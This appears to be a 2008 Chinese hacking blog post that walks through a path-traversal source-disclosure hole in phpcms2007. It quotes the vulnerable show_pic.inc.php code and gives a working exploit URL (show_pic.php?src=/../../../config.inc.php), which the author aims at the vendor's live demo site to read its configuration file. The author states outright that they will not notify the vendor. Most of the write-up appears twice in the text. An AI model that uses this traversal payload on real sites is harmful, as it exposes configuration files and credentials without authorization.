關(guān)于簡單的php源代碼泄露漏洞的發(fā)掘
互聯(lián)網(wǎng) 發(fā)布時間:2008-10-08 21:26:46 作者:佚名
我要評論

我們知道在asp中出現(xiàn)得最多的還是sql注入,不過在php中由于magic_quotes_gpc為on的情況下特殊字符會被轉(zhuǎn)義,所以即使有很多時候存在sql注入也無法利用。但是php強大的文件操作功能卻使我們能體會到在asp中無法體會的樂趣,我想php自帶的文件操作函數(shù)能讓你為之心跳加快~~
我們知道在asp中出現(xiàn)得最多的還是sql注入,不過在php中由于magic_quotes_gpc為on的情況下特殊字符會被轉(zhuǎn)義,所以即使有很多時候存在sql注入也無法利用。但是php強大的文件操作功能卻使我們能體會到在asp中無法體會的樂趣,我想php自帶的文件操作函數(shù)能讓你為之心跳加快~~嘿嘿
這次我發(fā)掘的是phpcms2007的源代碼泄露漏洞
再次向Phpcms2007的開源行為致敬?。?
開始吧,
findstr /s /n /i readfile *.php >readfile.txt (結(jié)果我只給出有用的)
其他的文件操作函數(shù)可以自己定義查找
module\picture\show_pic.inc.php:8:readfile($file);
跟進這個文件看看吧,呵呵,比較小,我喜歡
[Copy to clipboard] [ - ]CODE:
<?php
defined(’IN_PHPCMS’) or exit(’Access Denied’);
require PHPCMS_ROOT.’/module/’.$mod.’/include/common.inc.php’;
isset($src) or exit;
$file = PHPCMS_ROOT.’/’.$PHPCMS[’uploaddir’].’/’.$CHA[’channeldir’].’/’.$MOD[’upload_dir’].’/’.$src;
if(empty($PHP_REFERER) || !strpos($PHP_REFERER, $PHP_DOMAIN)) $file = PHPCMS_ROOT.’/images/error.jpg’;
header("Content-type:image/pjpeg");
readfile($file);
?>
一路分析下。。。 先包含文件/module/’.$mod.’/include/common.inc.php 如果存在變量$src則賦予它路徑并把值交給變量$file 然后就是就進入if 這里我不看其他的文件簡單猜測下應(yīng)該是判斷url路徑來源,也就是防盜鏈的功能 然后就header()一個圖片頭 呵呵,輕輕松松就readfile($file); 可以看出它沒有判斷$src的文件類型,如果我們提交一個src=*.php也會被readfile 好吧,在這里漏洞是出現(xiàn)了 不過由于“defined(’IN_PHPCMS’) or exit(’Access Denied’);”,所以我們是無法直接利用這個漏洞文件的 只能是在其他包含這個文件的php文件中利用 繼續(xù)吧 [Copy to clipboard] [ - ]CODE:
findstr /s /i /n show_pic.inc.php *.php >show_pic.inc.php.txt picture\show_pic.php:4:require PHPCMS_ROOT."/module/".$mod."/show_pic.inc.php";
進去看看 [Copy to clipboard] [ - ]CODE:
<?php
require "./config.inc.php";
require "../include/common.inc.php";
require PHPCMS_ROOT."/module/".$mod."/show_pic.inc.php";
?>
呵呵,要是register_globals為on的話就可以直接利用這個文件讀取目標文件了
那就測試吧 官方是演示站是 [Copy to clipboard] [ - ]CODE:
http://demo.phpcms.cn/
那就這樣構(gòu)造url [Copy to clipboard] [ - ]CODE:
/picture/show_pic.php?src=/../../../config.inc.php
嘿嘿,讀取的就是網(wǎng)站的配置文件 直接訪問 [Copy to clipboard] [ - ]CODE:
http://demo.phpcms.cn//picture/show_pic.php?src=/../../../config.inc.php
呵呵,猜測沒錯?。? 那我們可以先訪問http://demo.phpcms.cn/抓包 用nc發(fā)包 get選項就設(shè)置為 [Copy to clipboard] [ - ]CODE:
/picture/show_pic.php?src=/../../../config.inc.php
這里我就用刺猬的一個post提交工具代替了 測試結(jié)果如圖 ok,就分析到這里了 希望大家不要利用這個做違法的事,嘿嘿??! 偶是壞孩子,不通知官方了~·好孩子去通知下。
<?php
defined(’IN_PHPCMS’) or exit(’Access Denied’);
require PHPCMS_ROOT.’/module/’.$mod.’/include/common.inc.php’;
isset($src) or exit;
$file = PHPCMS_ROOT.’/’.$PHPCMS[’uploaddir’].’/’.$CHA[’channeldir’].’/’.$MOD[’upload_dir’].’/’.$src;
if(empty($PHP_REFERER) || !strpos($PHP_REFERER, $PHP_DOMAIN)) $file = PHPCMS_ROOT.’/images/error.jpg’;
header("Content-type:image/pjpeg");
readfile($file);
?>
一路分析下。。。 先包含文件/module/’.$mod.’/include/common.inc.php 如果存在變量$src則賦予它路徑并把值交給變量$file 然后就是就進入if 這里我不看其他的文件簡單猜測下應(yīng)該是判斷url路徑來源,也就是防盜鏈的功能 然后就header()一個圖片頭 呵呵,輕輕松松就readfile($file); 可以看出它沒有判斷$src的文件類型,如果我們提交一個src=*.php也會被readfile 好吧,在這里漏洞是出現(xiàn)了 不過由于“defined(’IN_PHPCMS’) or exit(’Access Denied’);”,所以我們是無法直接利用這個漏洞文件的 只能是在其他包含這個文件的php文件中利用 繼續(xù)吧 [Copy to clipboard] [ - ]CODE:
findstr /s /i /n show_pic.inc.php *.php >show_pic.inc.php.txt picture\show_pic.php:4:require PHPCMS_ROOT."/module/".$mod."/show_pic.inc.php";
進去看看 [Copy to clipboard] [ - ]CODE:
<?php
require "./config.inc.php";
require "../include/common.inc.php";
require PHPCMS_ROOT."/module/".$mod."/show_pic.inc.php";
?>
呵呵,要是register_globals為on的話就可以直接利用這個文件讀取目標文件了
那就測試吧 官方是演示站是 [Copy to clipboard] [ - ]CODE:
http://demo.phpcms.cn/
那就這樣構(gòu)造url [Copy to clipboard] [ - ]CODE:
/picture/show_pic.php?src=/../../../config.inc.php
嘿嘿,讀取的就是網(wǎng)站的配置文件 直接訪問 [Copy to clipboard] [ - ]CODE:
http://demo.phpcms.cn//picture/show_pic.php?src=/../../../config.inc.php
呵呵,猜測沒錯?。? 那我們可以先訪問http://demo.phpcms.cn/抓包 用nc發(fā)包 get選項就設(shè)置為 [Copy to clipboard] [ - ]CODE:
/picture/show_pic.php?src=/../../../config.inc.php
這里我就用刺猬的一個post提交工具代替了 測試結(jié)果如圖 ok,就分析到這里了 希望大家不要利用這個做違法的事,嘿嘿??! 偶是壞孩子,不通知官方了~·好孩子去通知下。
相關(guān)文章
我們不知道的秘密? 黑客可以使用硬件破解GSM A5加密算法
以前我們都是在使用基于早期信號標準的GSM手機,這也是當前應(yīng)用最為廣泛的移動電話標準,但是大家可能還不知道,現(xiàn)在專業(yè)的黑客可以只需要使用三張NVIDIA GeForce GTX690顯2016-11-06- 我們來看一下以前比較精典的一個溢出實例ms04011溢出: Microsoft Windows XP [版本 5.1.2600] (C) 版權(quán)所有 1985-2001 Microsoft Corp. C:windowssystem32cd C2008-10-08
- 今晚群里朋友叫看個站,有sql防注入,繞不過,但是有發(fā)現(xiàn)記錄wrong的文件sqlin.asp。2012-05-15
- 我看暴庫漏洞原理及規(guī)律 SQL注入流行很久了,我們找漏洞注入目的無非是想得到數(shù)據(jù)庫內(nèi)的東西,比如用戶名密碼等,更進一步的MSSQL數(shù)據(jù)庫還可以借此獲得權(quán)限?;贏ccess2008-10-08
- 近期發(fā)現(xiàn)adobe.com,internet.com,nike.com,等等著名站點都分分遭受到攻擊,但攻擊者所使用的技術(shù)并不是以往所使用的入侵WEB服務(wù)器,更改主頁的慣用手法,攻擊者使用的是一2008-10-08
- FCKeditor的JSP版漏洞 http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFol2009-04-20
- 1.安裝完軟件,打開后: 2.按照圖中點選正確的設(shè)置,填寫上你自己找到的代理IP地址,端口,或者帳號和密碼: 3.(這一步看情況定:有的代理不要2008-10-08
- 軟件名稱:Pstools 運行平臺:Windows 軟件授權(quán):免費軟件 軟件大小:550KB 下面我用一個實例來講解這個命令的使用。假設(shè)我要對192.168.0.8計算機進行2009-07-05
WordPress自動更新漏洞:超1/4網(wǎng)站可被黑客一舉擊潰
最近大部分的WordPress網(wǎng)站都受到影響,主要的原因就是WordPress的自動更新功能造成的,因此全球超1/4的網(wǎng)站被黑2016-11-29